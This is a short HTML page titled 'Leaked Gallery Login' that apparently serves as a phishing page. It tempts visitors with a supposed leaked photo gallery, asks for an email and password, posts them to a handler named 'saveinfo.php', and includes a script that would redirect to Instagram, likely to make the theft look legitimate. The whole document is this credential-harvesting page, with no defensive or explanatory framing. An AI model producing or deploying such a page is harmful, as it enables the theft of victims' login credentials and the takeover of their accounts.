<!DOCTYPE html>
<html>
<head>
	<link rel="stylesheet" type="text/css" href="style.css">
	<title>Leaked Gallery Login</title>
</head>
<body>
	<a href="home.html" class="home-button">Home</a>

	<h1>Leaked Gallery Login</h1>
	<form method="post" action="saveinfo.php" >
		<label for="email">Email:</label>
		<input type="email" id="email" name="email" required><br><br>

		<label for="password">Password:</label>
		<input type="password" id="password" name="password" required><br><br>

		<input type="submit" value="view">
	</form>

	<script>
		function redirectToInstagram() {
			window.location.href = "https://instagram.com";
		}
	</script>
</body>
</html>

